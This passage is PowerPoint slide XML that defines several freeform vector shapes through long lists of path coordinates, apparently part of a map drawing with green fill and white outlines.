                    <a:lnTo>
                      <a:pt x="1383" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1380" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="1695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="1700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="1703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="1704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1366" y="1706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1362" y="1712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="1715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="1715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="1713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="1711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1361" y="1707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1364" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="1698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1364" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1357" y="1700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1354" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="1699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1354" y="1694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1348" y="1694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1347" y="1697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="1699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1337" y="1700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1332" y="1699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="1697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="1697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="1697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1297" y="1692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="1690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1302" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="1676"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="272" y="1680"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="1676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="1672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="1670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="1668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="1663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="1663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="1663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="1658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="1654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="1654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="1653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="1650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="1647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="1641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="1642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="1641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="1635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="1626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="1621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="1621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="1628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="1630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="1632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="1635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="1641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="1648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="1653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="1655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="1661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="1663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="1671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="1676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="1679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="1680"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36215" name="Freeform 348"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="627" y="1922"/>
                <a:ext cx="19" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 19"/>
                  <a:gd name="T1" fmla="*/ 21 h 21"/>
                  <a:gd name="T2" fmla="*/ 2 w 19"/>
                  <a:gd name="T3" fmla="*/ 11 h 21"/>
                  <a:gd name="T4" fmla="*/ 0 w 19"/>
                  <a:gd name="T5" fmla="*/ 7 h 21"/>
                  <a:gd name="T6" fmla="*/ 0 w 19"/>
                  <a:gd name="T7" fmla="*/ 1 h 21"/>
                  <a:gd name="T8" fmla="*/ 1 w 19"/>
                  <a:gd name="T9" fmla="*/ 0 h 21"/>
                  <a:gd name="T10" fmla="*/ 4 w 19"/>
                  <a:gd name="T11" fmla="*/ 0 h 21"/>
                  <a:gd name="T12" fmla="*/ 6 w 19"/>
                  <a:gd name="T13" fmla="*/ 0 h 21"/>
                  <a:gd name="T14" fmla="*/ 12 w 19"/>
                  <a:gd name="T15" fmla="*/ 2 h 21"/>
                  <a:gd name="T16" fmla="*/ 16 w 19"/>
                  <a:gd name="T17" fmla="*/ 1 h 21"/>
                  <a:gd name="T18" fmla="*/ 18 w 19"/>
                  <a:gd name="T19" fmla="*/ 2 h 21"/>
                  <a:gd name="T20" fmla="*/ 19 w 19"/>
                  <a:gd name="T21" fmla="*/ 4 h 21"/>
                  <a:gd name="T22" fmla="*/ 18 w 19"/>
                  <a:gd name="T23" fmla="*/ 7 h 21"/>
                  <a:gd name="T24" fmla="*/ 16 w 19"/>
                  <a:gd name="T25" fmla="*/ 14 h 21"/>
                  <a:gd name="T26" fmla="*/ 16 w 19"/>
                  <a:gd name="T27" fmla="*/ 17 h 21"/>
                  <a:gd name="T28" fmla="*/ 12 w 19"/>
                  <a:gd name="T29" fmla="*/ 18 h 21"/>
                  <a:gd name="T30" fmla="*/ 9 w 19"/>
                  <a:gd name="T31" fmla="*/ 21 h 2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9"/>
                  <a:gd name="T49" fmla="*/ 0 h 21"/>
                  <a:gd name="T50" fmla="*/ 19 w 19"/>
                  <a:gd name="T51" fmla="*/ 21 h 21"/>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9" h="21">
                    <a:moveTo>
                      <a:pt x="9" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="21"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36216" name="Freeform 349"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1513" y="1443"/>
                <a:ext cx="34" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 34"/>
                  <a:gd name="T1" fmla="*/ 45 h 45"/>
                  <a:gd name="T2" fmla="*/ 6 w 34"/>
                  <a:gd name="T3" fmla="*/ 45 h 45"/>
                  <a:gd name="T4" fmla="*/ 3 w 34"/>
                  <a:gd name="T5" fmla="*/ 42 h 45"/>
                  <a:gd name="T6" fmla="*/ 2 w 34"/>
                  <a:gd name="T7" fmla="*/ 37 h 45"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 28 h 45"/>
                  <a:gd name="T10" fmla="*/ 2 w 34"/>
                  <a:gd name="T11" fmla="*/ 20 h 45"/>
                  <a:gd name="T12" fmla="*/ 7 w 34"/>
                  <a:gd name="T13" fmla="*/ 8 h 45"/>
                  <a:gd name="T14" fmla="*/ 12 w 34"/>
                  <a:gd name="T15" fmla="*/ 3 h 45"/>
                  <a:gd name="T16" fmla="*/ 22 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 45"/>
                  <a:gd name="T18" fmla="*/ 28 w 34"/>
                  <a:gd name="T19" fmla="*/ 4 h 45"/>
                  <a:gd name="T20" fmla="*/ 34 w 34"/>
                  <a:gd name="T21" fmla="*/ 9 h 45"/>
                  <a:gd name="T22" fmla="*/ 34 w 34"/>
                  <a:gd name="T23" fmla="*/ 18 h 45"/>
                  <a:gd name="T24" fmla="*/ 34 w 34"/>
                  <a:gd name="T25" fmla="*/ 32 h 45"/>
                  <a:gd name="T26" fmla="*/ 31 w 34"/>
                  <a:gd name="T27" fmla="*/ 37 h 45"/>
                  <a:gd name="T28" fmla="*/ 24 w 34"/>
                  <a:gd name="T29" fmla="*/ 43 h 45"/>
                  <a:gd name="T30" fmla="*/ 16 w 34"/>
                  <a:gd name="T31" fmla="*/ 45 h 45"/>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34"/>
                  <a:gd name="T49" fmla="*/ 0 h 45"/>
                  <a:gd name="T50" fmla="*/ 34 w 34"/>
                  <a:gd name="T51" fmla="*/ 45 h 45"/>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34" h="45">
                    <a:moveTo>
                      <a:pt x="16" y="45"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="45"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36217" name="Freeform 350"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1162" y="1377"/>
                <a:ext cx="61" cy="58"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 46 w 61"/>
                  <a:gd name="T1" fmla="*/ 58 h 58"/>
                  <a:gd name="T2" fmla="*/ 41 w 61"/>
                  <a:gd name="T3" fmla="*/ 58 h 58"/>
                  <a:gd name="T4" fmla="*/ 35 w 61"/>
                  <a:gd name="T5" fmla="*/ 54 h 58"/>
                  <a:gd name="T6" fmla="*/ 28 w 61"/>
                  <a:gd name="T7" fmla="*/ 53 h 58"/>
                  <a:gd name="T8" fmla="*/ 19 w 61"/>
                  <a:gd name="T9" fmla="*/ 47 h 58"/>
                  <a:gd name="T10" fmla="*/ 12 w 61"/>
                  <a:gd name="T11" fmla="*/ 43 h 58"/>
                  <a:gd name="T12" fmla="*/ 8 w 61"/>
                  <a:gd name="T13" fmla="*/ 42 h 58"/>
                  <a:gd name="T14" fmla="*/ 0 w 61"/>
                  <a:gd name="T15" fmla="*/ 38 h 58"/>
                  <a:gd name="T16" fmla="*/ 3 w 61"/>
                  <a:gd name="T17" fmla="*/ 32 h 58"/>
                  <a:gd name="T18" fmla="*/ 14 w 61"/>
                  <a:gd name="T19" fmla="*/ 23 h 58"/>
                  <a:gd name="T20" fmla="*/ 17 w 61"/>
                  <a:gd name="T21" fmla="*/ 20 h 58"/>
                  <a:gd name="T22" fmla="*/ 18 w 61"/>
                  <a:gd name="T23" fmla="*/ 6 h 58"/>
                  <a:gd name="T24" fmla="*/ 20 w 61"/>
                  <a:gd name="T25" fmla="*/ 1 h 58"/>
                  <a:gd name="T26" fmla="*/ 26 w 61"/>
                  <a:gd name="T27" fmla="*/ 0 h 58"/>
                  <a:gd name="T28" fmla="*/ 31 w 61"/>
                  <a:gd name="T29" fmla="*/ 3 h 58"/>
                  <a:gd name="T30" fmla="*/ 42 w 61"/>
                  <a:gd name="T31" fmla="*/ 16 h 58"/>
                  <a:gd name="T32" fmla="*/ 51 w 61"/>
                  <a:gd name="T33" fmla="*/ 24 h 58"/>
                  <a:gd name="T34" fmla="*/ 51 w 61"/>
                  <a:gd name="T35" fmla="*/ 30 h 58"/>
                  <a:gd name="T36" fmla="*/ 54 w 61"/>
                  <a:gd name="T37" fmla="*/ 35 h 58"/>
                  <a:gd name="T38" fmla="*/ 61 w 61"/>
                  <a:gd name="T39" fmla="*/ 46 h 58"/>
                  <a:gd name="T40" fmla="*/ 59 w 61"/>
                  <a:gd name="T41" fmla="*/ 48 h 58"/>
                  <a:gd name="T42" fmla="*/ 50 w 61"/>
                  <a:gd name="T43" fmla="*/ 57 h 58"/>
                  <a:gd name="T44" fmla="*/ 46 w 61"/>
                  <a:gd name="T45" fmla="*/ 58 h 58"/>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61"/>
                  <a:gd name="T70" fmla="*/ 0 h 58"/>
                  <a:gd name="T71" fmla="*/ 61 w 61"/>
                  <a:gd name="T72" fmla="*/ 58 h 58"/>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61" h="58">
                    <a:moveTo>
                      <a:pt x="46" y="58"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="41" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="58"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36218" name="Freeform 351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="501" y="1277"/>
                <a:ext cx="1355" cy="939"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1142 w 1355"/>
                  <a:gd name="T1" fmla="*/ 810 h 939"/>
                  <a:gd name="T2" fmla="*/ 1022 w 1355"/>
                  <a:gd name="T3" fmla="*/ 894 h 939"/>
                  <a:gd name="T4" fmla="*/ 931 w 1355"/>
                  <a:gd name="T5" fmla="*/ 939 h 939"/>
                  <a:gd name="T6" fmla="*/ 901 w 1355"/>
                  <a:gd name="T7" fmla="*/ 838 h 939"/>
                  <a:gd name="T8" fmla="*/ 795 w 1355"/>
                  <a:gd name="T9" fmla="*/ 795 h 939"/>
                  <a:gd name="T10" fmla="*/ 742 w 1355"/>
                  <a:gd name="T11" fmla="*/ 774 h 939"/>
                  <a:gd name="T12" fmla="*/ 517 w 1355"/>
                  <a:gd name="T13" fmla="*/ 772 h 939"/>
                  <a:gd name="T14" fmla="*/ 275 w 1355"/>
                  <a:gd name="T15" fmla="*/ 761 h 939"/>
                  <a:gd name="T16" fmla="*/ 216 w 1355"/>
                  <a:gd name="T17" fmla="*/ 724 h 939"/>
                  <a:gd name="T18" fmla="*/ 194 w 1355"/>
                  <a:gd name="T19" fmla="*/ 659 h 939"/>
                  <a:gd name="T20" fmla="*/ 144 w 1355"/>
                  <a:gd name="T21" fmla="*/ 569 h 939"/>
                  <a:gd name="T22" fmla="*/ 32 w 1355"/>
                  <a:gd name="T23" fmla="*/ 463 h 939"/>
                  <a:gd name="T24" fmla="*/ 44 w 1355"/>
                  <a:gd name="T25" fmla="*/ 131 h 939"/>
                  <a:gd name="T26" fmla="*/ 126 w 1355"/>
                  <a:gd name="T27" fmla="*/ 107 h 939"/>
                  <a:gd name="T28" fmla="*/ 134 w 1355"/>
                  <a:gd name="T29" fmla="*/ 126 h 939"/>
                  <a:gd name="T30" fmla="*/ 210 w 1355"/>
                  <a:gd name="T31" fmla="*/ 77 h 939"/>
                  <a:gd name="T32" fmla="*/ 255 w 1355"/>
                  <a:gd name="T33" fmla="*/ 97 h 939"/>
                  <a:gd name="T34" fmla="*/ 376 w 1355"/>
                  <a:gd name="T35" fmla="*/ 138 h 939"/>
                  <a:gd name="T36" fmla="*/ 464 w 1355"/>
                  <a:gd name="T37" fmla="*/ 191 h 939"/>
                  <a:gd name="T38" fmla="*/ 538 w 1355"/>
                  <a:gd name="T39" fmla="*/ 220 h 939"/>
                  <a:gd name="T40" fmla="*/ 616 w 1355"/>
                  <a:gd name="T41" fmla="*/ 191 h 939"/>
                  <a:gd name="T42" fmla="*/ 690 w 1355"/>
                  <a:gd name="T43" fmla="*/ 165 h 939"/>
                  <a:gd name="T44" fmla="*/ 736 w 1355"/>
                  <a:gd name="T45" fmla="*/ 177 h 939"/>
                  <a:gd name="T46" fmla="*/ 763 w 1355"/>
                  <a:gd name="T47" fmla="*/ 114 h 939"/>
                  <a:gd name="T48" fmla="*/ 713 w 1355"/>
                  <a:gd name="T49" fmla="*/ 28 h 939"/>
                  <a:gd name="T50" fmla="*/ 776 w 1355"/>
                  <a:gd name="T51" fmla="*/ 68 h 939"/>
                  <a:gd name="T52" fmla="*/ 807 w 1355"/>
                  <a:gd name="T53" fmla="*/ 166 h 939"/>
                  <a:gd name="T54" fmla="*/ 849 w 1355"/>
                  <a:gd name="T55" fmla="*/ 209 h 939"/>
                  <a:gd name="T56" fmla="*/ 893 w 1355"/>
                  <a:gd name="T57" fmla="*/ 101 h 939"/>
                  <a:gd name="T58" fmla="*/ 940 w 1355"/>
                  <a:gd name="T59" fmla="*/ 190 h 939"/>
                  <a:gd name="T60" fmla="*/ 887 w 1355"/>
                  <a:gd name="T61" fmla="*/ 248 h 939"/>
                  <a:gd name="T62" fmla="*/ 807 w 1355"/>
                  <a:gd name="T63" fmla="*/ 262 h 939"/>
                  <a:gd name="T64" fmla="*/ 812 w 1355"/>
                  <a:gd name="T65" fmla="*/ 349 h 939"/>
                  <a:gd name="T66" fmla="*/ 771 w 1355"/>
                  <a:gd name="T67" fmla="*/ 379 h 939"/>
                  <a:gd name="T68" fmla="*/ 736 w 1355"/>
                  <a:gd name="T69" fmla="*/ 506 h 939"/>
                  <a:gd name="T70" fmla="*/ 830 w 1355"/>
                  <a:gd name="T71" fmla="*/ 570 h 939"/>
                  <a:gd name="T72" fmla="*/ 934 w 1355"/>
                  <a:gd name="T73" fmla="*/ 652 h 939"/>
                  <a:gd name="T74" fmla="*/ 975 w 1355"/>
                  <a:gd name="T75" fmla="*/ 718 h 939"/>
                  <a:gd name="T76" fmla="*/ 988 w 1355"/>
                  <a:gd name="T77" fmla="*/ 647 h 939"/>
                  <a:gd name="T78" fmla="*/ 1010 w 1355"/>
                  <a:gd name="T79" fmla="*/ 530 h 939"/>
                  <a:gd name="T80" fmla="*/ 1010 w 1355"/>
                  <a:gd name="T81" fmla="*/ 449 h 939"/>
                  <a:gd name="T82" fmla="*/ 1066 w 1355"/>
                  <a:gd name="T83" fmla="*/ 394 h 939"/>
                  <a:gd name="T84" fmla="*/ 1132 w 1355"/>
                  <a:gd name="T85" fmla="*/ 461 h 939"/>
                  <a:gd name="T86" fmla="*/ 1159 w 1355"/>
                  <a:gd name="T87" fmla="*/ 528 h 939"/>
                  <a:gd name="T88" fmla="*/ 1207 w 1355"/>
                  <a:gd name="T89" fmla="*/ 477 h 939"/>
                  <a:gd name="T90" fmla="*/ 1254 w 1355"/>
                  <a:gd name="T91" fmla="*/ 547 h 939"/>
                  <a:gd name="T92" fmla="*/ 1266 w 1355"/>
                  <a:gd name="T93" fmla="*/ 589 h 939"/>
                  <a:gd name="T94" fmla="*/ 1304 w 1355"/>
                  <a:gd name="T95" fmla="*/ 642 h 939"/>
                  <a:gd name="T96" fmla="*/ 1332 w 1355"/>
                  <a:gd name="T97" fmla="*/ 660 h 939"/>
                  <a:gd name="T98" fmla="*/ 1306 w 1355"/>
                  <a:gd name="T99" fmla="*/ 720 h 939"/>
                  <a:gd name="T100" fmla="*/ 1172 w 1355"/>
                  <a:gd name="T101" fmla="*/ 760 h 939"/>
                  <a:gd name="T102" fmla="*/ 1131 w 1355"/>
                  <a:gd name="T103" fmla="*/ 803 h 939"/>
                  <a:gd name="T104" fmla="*/ 1193 w 1355"/>
                  <a:gd name="T105" fmla="*/ 793 h 939"/>
                  <a:gd name="T106" fmla="*/ 1209 w 1355"/>
                  <a:gd name="T107" fmla="*/ 818 h 939"/>
                  <a:gd name="T108" fmla="*/ 1226 w 1355"/>
                  <a:gd name="T109" fmla="*/ 847 h 939"/>
                  <a:gd name="T110" fmla="*/ 1266 w 1355"/>
                  <a:gd name="T111" fmla="*/ 854 h 939"/>
                  <a:gd name="T112" fmla="*/ 1247 w 1355"/>
                  <a:gd name="T113" fmla="*/ 869 h 939"/>
                  <a:gd name="T114" fmla="*/ 1218 w 1355"/>
                  <a:gd name="T115" fmla="*/ 875 h 939"/>
                  <a:gd name="T116" fmla="*/ 1204 w 1355"/>
                  <a:gd name="T117" fmla="*/ 894 h 939"/>
                  <a:gd name="T118" fmla="*/ 1194 w 1355"/>
                  <a:gd name="T119" fmla="*/ 873 h 939"/>
                  <a:gd name="T120" fmla="*/ 1227 w 1355"/>
                  <a:gd name="T121" fmla="*/ 857 h 939"/>
                  <a:gd name="T122" fmla="*/ 1195 w 1355"/>
                  <a:gd name="T123" fmla="*/ 860 h 939"/>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355"/>
                  <a:gd name="T187" fmla="*/ 0 h 939"/>
                  <a:gd name="T188" fmla="*/ 1355 w 1355"/>
                  <a:gd name="T189" fmla="*/ 939 h 939"/>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355" h="939">
                    <a:moveTo>
                      <a:pt x="1172" y="861"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1171" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1169" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1171" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1166" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1164" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1159" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1154" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
